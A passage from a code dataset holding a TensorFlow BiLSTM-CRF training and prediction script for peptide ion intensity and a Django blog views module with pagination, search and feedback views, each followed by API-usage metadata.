suffled_train_piptide_index=np.array(train_piptide_index)[permutation_peptide].tolist()\r\n\t\t\t\t\r\n #padding_pep_num=args.batch_size-len(train_piptide_index)\r\n for j in range(len(suffled_train_piptide_index)):\r\n train_ion_index=data.get_split_list(suffled_train_piptide_index[j])\r\n X.append(padding_data(train_X[np.array(train_ion_index)],1,max_ions_number))\r\n y.append(padding_data(train_y[np.array(train_ion_index)],0,max_ions_number))\r\n #if padding_pep_num >0:\r\n # for k in range(padding_pep_num):\r\n \r\n # X.append(padding_data(np.zeros((2,args.input_size)),1,max_ions_number))\r\n # y.append(padding_data(np.zeros((2,)),0,max_ions_number))\r\n \r\n feed_dict = {\r\n model.X:np.array(X),\r\n model.y:np.array(y),\r\n model.keep_prob:args.keep_prob,\r\n model.seq_length:suffled_seq,\r\n model.max_time:max_ions_number,\r\n model.batch_size:len(X)\r\n \r\n }\r\n _, loss, state, pred = sess.run(\r\n [model.train_op, model.loss,model.states, model.tags],\r\n feed_dict=feed_dict)\r\n train_loss+=loss \r\n mask = (np.expand_dims(np.arange(max_ions_number), axis=0) < np.expand_dims(suffled_seq, axis=1))\r\n total_labels = np.sum(suffled_seq)\r\n correct_labels = np.sum((np.array(y) == pred) * mask)\r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n train_acc+=accuracy\r\n val_acc=0;val_loss=0\r\n for i, val_piptide_index in enumerate(val_batch_peptide):\r\n X=[];y=[]\r\n \r\n max_ions_number=max(val_seq_length[i])\r\n for j in range(len(val_piptide_index)):\r\n train_ion_index=data.get_split_list(val_piptide_index[j])\r\n X.append(padding_data(val_X[np.array(train_ion_index)],1,max_ions_number))\r\n y.append(padding_data(val_y[np.array(train_ion_index)],0,max_ions_number))\r\n feed_dict_val = {\r\n model.X:np.array(X),\r\n model.y:np.array(y),\r\n model.keep_prob:args.keep_prob,\r\n model.seq_length:val_seq_length[i],\r\n model.max_time:max_ions_number,\r\n model.batch_size:len(X)\r\n 
\r\n }\r\n loss_val, pred_val = sess.run([model.loss, model.tags],feed_dict=feed_dict_val)\r\n val_loss+=loss_val\r\n mask = (np.expand_dims(np.arange(max_ions_number), axis=0) < np.expand_dims(val_seq_length[i], axis=1))\r\n total_labels = np.sum(val_seq_length[i])\r\n correct_labels = np.sum((np.array(y) == pred_val) * mask)\r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n val_acc+=accuracy \r\n #val_acc,val_loss=val(args,model,val_X,val_y,val_batch_peptide,val_seq_length)\r\n print(\"Epoch: %d\" % (Iter+1), \"train loss: %.2f\" % (train_loss/_batch_number),\"train acc: %.2f%%\" % (train_acc/_batch_number))\r\n print(\"Epoch: %d\" % (Iter+1), \"val loss: %.2f\" % (val_loss/val_batch_number),\"val acc: %.2f%%\" % (val_acc/val_batch_number))\r\n result = sess.run(merged, feed_dict)\r\n writer.add_summary(result, Iter)\r\n \r\n #print('Iter[%d/%d],loss[%.4f]' % (Iter+1,args.num_iter,round(loss,4)))\r\n print(\"SaveModel:\",tf.train.Saver().save(sess,'lstm/model/model.ckpt'))\r\n \r\n \r\ndef MSE(label,pred):\r\n return tf.reduce_mean(tf.square(pred-label)) \r\n \r\ndef model_predict(args,kmodel,test_data,merge_test_list,test_label):\r\n print('predicting..')\r\n \r\n print('number of peptide:'+str(len(merge_test_list[0])))\r\n with tf.Session() as session:\r\n batch_peptide,_batch_number,_seq_length=get_batch_peptide(merge_test_list,args.batch_size)\r\n \r\n\r\n saver = tf.train.import_meta_graph('lstm/model/model.ckpt.meta')\r\n saver.restore(session, tf.train.latest_checkpoint('lstm/model/'))\r\n graph=tf.get_default_graph()\r\n inputs_X=graph.get_operation_by_name(\"inputs/X\").outputs[0]\r\n batch_size=graph.get_operation_by_name(\"batch_size\").outputs[0] \r\n keep_prob=graph.get_operation_by_name(\"keep_prob\").outputs[0]\r\n max_time=graph.get_operation_by_name(\"max_time\").outputs[0]\r\n seq_length=graph.get_operation_by_name(\"seq_length\").outputs[0]\r\n\r\n pred_y=tf.get_collection(\"pred_network\")[0]\r\n pred=[];aaa=[]\r\n mse_list=[]\r\n total_labels=0;correct_labels=0\r\n for i,(test_piptide_index) in enumerate(batch_peptide):\r\n X=[];y=[]\r\n _max_ions_number=max(_seq_length[i])\r\n padding_pep_num=args.batch_size-len(test_piptide_index)\r\n for j in range(len(test_piptide_index)):\r\n test_ion_index=data.get_split_list(test_piptide_index[j])\r\n X.append(padding_data(test_data[np.array(test_ion_index)],1,_max_ions_number))\r\n y.append(padding_data(test_label[np.array(test_ion_index)],0,_max_ions_number))\r\n \r\n\r\n pred_ = session.run(pred_y,feed_dict={\r\n inputs_X: np.array(X),\r\n keep_prob:args.keep_prob,\r\n seq_length:_seq_length[i],\r\n max_time:_max_ions_number,\r\n batch_size:len(X)\r\n })\r\n for k in range(len(X)): \r\n pred.extend(pred_[k][:_seq_length[i][k]])\r\n aaa.extend(y[k][:_seq_length[i][k]])\r\n\r\n mask = (np.expand_dims(np.arange(_max_ions_number), axis=0) < np.expand_dims(_seq_length[i], axis=1))\r\n total_labels += np.sum(_seq_length[i])\r\n correct_labels += np.sum((np.array(y) == pred_) * mask)\r\n \r\n accuracy = 100.0 * correct_labels / float(total_labels)\r\n print(\"test Accuracy: %.2f%%\" % accuracy)\r\n #pred_[pred_>1]=1\r\n #pred_[pred_<0]=0 \r\n #_mse=session.run(MSE(np.reshape(y,(-1,1)),pred_))\r\n #mse_list.append(_mse)\r\n cunt=0;cunt2=0\r\n for i in range(len(aaa)):\r\n if aaa[i]==0:\r\n cunt+=1\r\n if aaa[i]==pred[i]:\r\n cunt2+=1\r\n \r\n print(cunt/len(aaa))\r\n print(cunt2/len(aaa))\r\n predaaa = pd.DataFrame({\"pred\":pred,\"label\":aaa})\r\n predaaa.to_csv('data//SwedCAD_pred2.csv')\r\n min_max_scaler = 
preprocessing.MinMaxScaler()\r\n pred_minmax = min_max_scaler.fit_transform(pred)\r\n return pred_minmax\r\n\r\ndef get_merge_pred(merge_list,pred,data):\r\n print('get predict spectrum intensity list...')\r\n merge_list.append(data.merge_list_1label(pred))\r\n return merge_list\r\ndef calc_pear(test_idx,peptide,pred,merge_list,pear,data):\r\n \r\n pred_pd=pear.write_pred(test_idx,peptide,pred)\r\n merge_list=get_merge_pred(merge_list,pred_pd,data)\r\n \r\n person_mean=pear.get_pearson(merge_list) \r\n return person_mean\r\n\r\ndef test(args,data,pear):\r\n test_idx,peptide,pred,merge_test_list=model_predict(args,data)\r\n person_mean=calc_pear(test_idx,peptide,pred,merge_test_list,pear,data)\r\n print(person_mean)\r\n\r\ndef main(args,data,pear):\r\n if args.is_train==1:\r\n model_train(args)\r\n elif args.is_train==2:\r\n test(args,data,pear)\r\n else:\r\n model_train(args)\r\n test(args,data,pear)\r\n\r\nif __name__ == '__main__':\r\n args=parse_args()\r\n \r\n data=GetData(args.intensity_num_label)\r\n pear=CalcPerson(args.intensity_num_label)\r\n main(args,data,pear)\r\n ", "sub_path": "lstm/BiLSTM_CRF.py", "file_name": "BiLSTM_CRF.py", "file_ext": "py", "file_size_in_byte": 19636, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "os.environ", "line_number": 13, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 14, "usage_type": "call"}, {"api_name": "os.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 14, "usage_type": "call"}, {"api_name": "os.sys.path.append", "line_number": 15, "usage_type": "call"}, {"api_name": "os.sys", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 15, "usage_type": "call"}, {"api_name": "os.path", "line_number": 15, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 15, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 39, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 39, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 47, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 47, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 48, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 48, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 51, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 52, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 53, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 54, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 62, "usage_type": "call"}, {"api_name": 
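Note: the padding_data helper and the accuracy computation in the record above rest on two tricks: zero-padding variable-length peptides to the batch maximum, and masking padded positions with a broadcast np.arange comparison against the sequence lengths. A compact standalone version of both steps; the names pad_batch and masked_accuracy are invented for illustration.

import numpy as np

def pad_batch(seqs, feat_dim):
    # Zero-pad a list of (len_i, feat_dim) arrays to (N, max_len, feat_dim).
    lengths = np.array([len(s) for s in seqs])
    out = np.zeros((len(seqs), lengths.max(), feat_dim), dtype=np.float32)
    for i, s in enumerate(seqs):
        out[i, :len(s)] = s
    return out, lengths

def masked_accuracy(y_true, y_pred, lengths):
    # Token-level accuracy that ignores padded positions, using the
    # same arange-vs-lengths broadcast mask as the script above.
    mask = np.arange(y_true.shape[1])[None, :] < lengths[:, None]
    return 100.0 * np.sum((y_true == y_pred) & mask) / np.sum(lengths)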
"tensorflow.get_collection", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.GraphKeys", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 73, "usage_type": "call"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 76, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.LSTMCell", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.rnn.DropoutWrapper", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 79, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.rnn.DropoutWrapper", "line_number": 80, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 80, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.MultiRNNCell", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 83, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.rnn_cell.MultiRNNCell", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 85, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.bidirectional_dynamic_rnn", "line_number": 89, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 89, "usage_type": "attribute"}, {"api_name": "tensorflow.float32", "line_number": 94, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.concat", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.summary.histogram", "line_number": 100, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 100, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.histogram", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 102, "usage_type": "attribute"}, {"api_name": "tensorflow.name_scope", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.reshape", "line_number": 109, "usage_type": "call"}, {"api_name": "tensorflow.contrib.crf.crf_log_likelihood", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.reshape", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 115, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 115, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.contrib.crf.crf_decode", "line_number": 119, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 119, "usage_type": 
"call"}, {"api_name": "tensorflow.int32", "line_number": 119, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.sparse_softmax_cross_entropy_with_logits", "line_number": 137, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.sequence_mask", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 139, "usage_type": "attribute"}, {"api_name": "tensorflow.boolean_mask", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.argmax", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.cast", "line_number": 144, "usage_type": "call"}, {"api_name": "tensorflow.int32", "line_number": 144, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.scalar", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 145, "usage_type": "attribute"}, {"api_name": "tensorflow.add_to_collection", "line_number": 146, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.subtract", "line_number": 167, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 171, "usage_type": "call"}, {"api_name": "tensorflow.get_variable", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 205, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 207, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 213, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 214, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 214, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 215, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 215, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 216, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 220, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 225, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 235, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 235, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 236, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.random.permutation", "line_number": 243, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 243, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 244, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 245, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 250, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 251, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 259, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 260, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 271, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 272, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 273, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 273, "usage_type": "call"}, 
{"api_name": "numpy.array", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 284, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 287, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 296, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 297, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 298, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 298, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 308, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 308, "usage_type": "attribute"}, {"api_name": "tensorflow.reduce_mean", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.square", "line_number": 312, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 318, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 322, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 322, "usage_type": "attribute"}, {"api_name": "tensorflow.train.latest_checkpoint", "line_number": 323, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 323, "usage_type": "attribute"}, {"api_name": "tensorflow.get_default_graph", "line_number": 324, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 331, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 341, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 342, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 346, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 356, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 357, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 358, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 358, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 375, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 377, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 377, "usage_type": "name"}, {"api_name": "tools.get_data.GetData", "line_number": 410, "usage_type": "call"}, {"api_name": "tools.pearson.CalcPerson", "line_number": 411, "usage_type": "call"}]} +{"seq_id": "377445186", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Author, Tag, Category, Post, About\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom .forms import FeedbackForm\nfrom django.contrib import messages\nfrom django.shortcuts import redirect\n\n\n# Create your views here.\ndef index(request):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n author = Author.objects.all()\n about_me = About.objects.all()\n url = \"https://www.iameric.net\"\n return render(request, 'blog/index.html', {\n 'author': author,\n 'about_me': about_me,\n 'recent_posts': recent_posts,\n 'url': url,\n })\n\n\n# view function to display a list of posts\ndef blog_home(request):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n tags = Tag.objects.all()\n posts = Post.objects.order_by(\"-id\").all()\n url = \"https://www.iameric.net\"\n paginator = 
Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'blog/home.html', {\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'url': url,\n })\n\n\ndef blog_post_detail(request, pk):\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n post = Post.objects.get(pk=pk)\n cates = Category.objects.all()\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n query = request.GET.get('q')\n if query:\n search = Post.objects.filter(title__icontains=query)\n else:\n search = Post.objects.all()\n\n return render(request, 'blog/post_detail.html', {\n 'post': post,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'search': search,\n 'url': url,\n })\n\n\n# view function to display post by category\ndef blog_post_by_category(request, category_slug):\n category = Category.objects.get(slug=category_slug)\n cates = Category.objects.all()\n posts = Post.objects.filter(category__slug=category_slug)\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n context = {\n 'category': category,\n 'posts': posts,\n 'cates': cates,\n 'recent_posts': recent_posts,\n 'tags': tags,\n 'url': url,\n }\n print(category)\n return render(request, 'blog/post_by_category.html', context)\n\n\n# view function to display post by tag\ndef blog_post_by_tag(request, tag_slug):\n tag = Tag.objects.get(slug=tag_slug)\n tags = Tag.objects.all()\n posts = Post.objects.filter(tags__slug=tag_slug)\n recent_posts = Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n url = \"https://www.iameric.net\"\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n context = {\n 'tags': tags,\n 'tag': tag,\n 'cates': cates,\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'url': url,\n }\n return render(request, 'blog/post_by_tag.html', context)\n\n\ndef blog_search(request):\n query = request.GET.get('q')\n recent_posts = 
Post.objects.order_by('-pub_date')[0:5]\n cates = Category.objects.all()\n tags = Tag.objects.all()\n url = \"https://www.iameric.net\"\n\n if query:\n posts = Post.objects.filter(title__icontains=query)\n else:\n posts = Post.objects.all()\n\n paginator = Paginator(posts, 8)\n\n # get the page parameter from the query string\n # if page parameter is available get() method will return empty string ''\n page = request.GET.get('page')\n\n try:\n # create Page object for the given page\n posts = paginator.page(page)\n except PageNotAnInteger:\n # if page parameter in the query string is not available, return the first page\n posts = paginator.page(1)\n except EmptyPage:\n # if the value of the page parameter exceeds num_pages then return the last page\n posts = paginator.page(paginator.num_pages)\n\n return render(request, 'blog/post_search.html', {\n 'posts': posts,\n 'recent_posts': recent_posts,\n 'cates': cates,\n 'tags': tags,\n 'query': query,\n 'url': url,\n })\n\n\ndef blog_feedback(request):\n if request.method == 'POST':\n f = FeedbackForm(request.POST)\n if f.is_valid():\n f.save()\n messages.add_message(request, messages.INFO, 'Feedback Submitted.')\n return redirect('blog_feedback')\n else:\n f = FeedbackForm()\n return render(request, 'blog/feedback.html', {'form': f})", "sub_path": "blog/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6319, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "models.Post.objects.order_by", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 12, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 12, "usage_type": "name"}, {"api_name": "models.Author.objects.all", "line_number": 13, "usage_type": "call"}, {"api_name": "models.Author.objects", "line_number": 13, "usage_type": "attribute"}, {"api_name": "models.Author", "line_number": 13, "usage_type": "name"}, {"api_name": "models.About.objects.all", "line_number": 14, "usage_type": "call"}, {"api_name": "models.About.objects", "line_number": 14, "usage_type": "attribute"}, {"api_name": "models.About", "line_number": 14, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 16, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 26, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 26, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 26, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 27, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 27, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 27, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 28, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 28, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 28, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 29, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 29, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 29, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 31, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 40, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 43, "usage_type": "name"}, 
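Note: the Paginator / PageNotAnInteger / EmptyPage block is repeated verbatim in blog_home, blog_post_by_category, blog_post_by_tag, and blog_search in the record above. A hypothetical helper like the one below would factor it out; the name paginate is invented and is not part of the app.

from django.core.paginator import Paginator, PageNotAnInteger, EmptyPage

def paginate(request, queryset, per_page=8):
    # Shared pagination: fall back to page 1 on a non-integer page
    # parameter and to the last page when the value is out of range.
    paginator = Paginator(queryset, per_page)
    page = request.GET.get('page')
    try:
        return paginator.page(page)
    except PageNotAnInteger:
        return paginator.page(1)
    except EmptyPage:
        return paginator.page(paginator.num_pages)

Each view could then reduce to a single call, e.g. posts = paginate(request, Post.objects.order_by('-id')).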
{"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "models.Post.objects.order_by", "line_number": 57, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 57, "usage_type": "name"}, {"api_name": "models.Post.objects.get", "line_number": 58, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 58, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 58, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 59, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 59, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 59, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 60, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 60, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 60, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 64, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 64, "usage_type": "name"}, {"api_name": "models.Post.objects.all", "line_number": 66, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 66, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 66, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 68, "usage_type": "call"}, {"api_name": "models.Category.objects.get", "line_number": 80, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 80, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 80, "usage_type": "name"}, {"api_name": "models.Category.objects.all", "line_number": 81, "usage_type": "call"}, {"api_name": "models.Category.objects", "line_number": 81, "usage_type": "attribute"}, {"api_name": "models.Category", "line_number": 81, "usage_type": "name"}, {"api_name": "models.Post.objects.filter", "line_number": 82, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 82, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 82, "usage_type": "name"}, {"api_name": "models.Post.objects.order_by", "line_number": 83, "usage_type": "call"}, {"api_name": "models.Post.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "models.Post", "line_number": 83, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 84, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 84, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 84, "usage_type": "name"}, {"api_name": "django.core.paginator.Paginator", "line_number": 86, "usage_type": "call"}, {"api_name": "django.core.paginator.PageNotAnInteger", "line_number": 95, "usage_type": "name"}, {"api_name": "django.core.paginator.EmptyPage", "line_number": 98, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 111, "usage_type": "call"}, {"api_name": "models.Tag.objects.get", "line_number": 116, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 116, "usage_type": "attribute"}, {"api_name": "models.Tag", "line_number": 116, "usage_type": "name"}, {"api_name": "models.Tag.objects.all", "line_number": 117, "usage_type": "call"}, {"api_name": "models.Tag.objects", "line_number": 117, "usage_type": "attribute"}, 
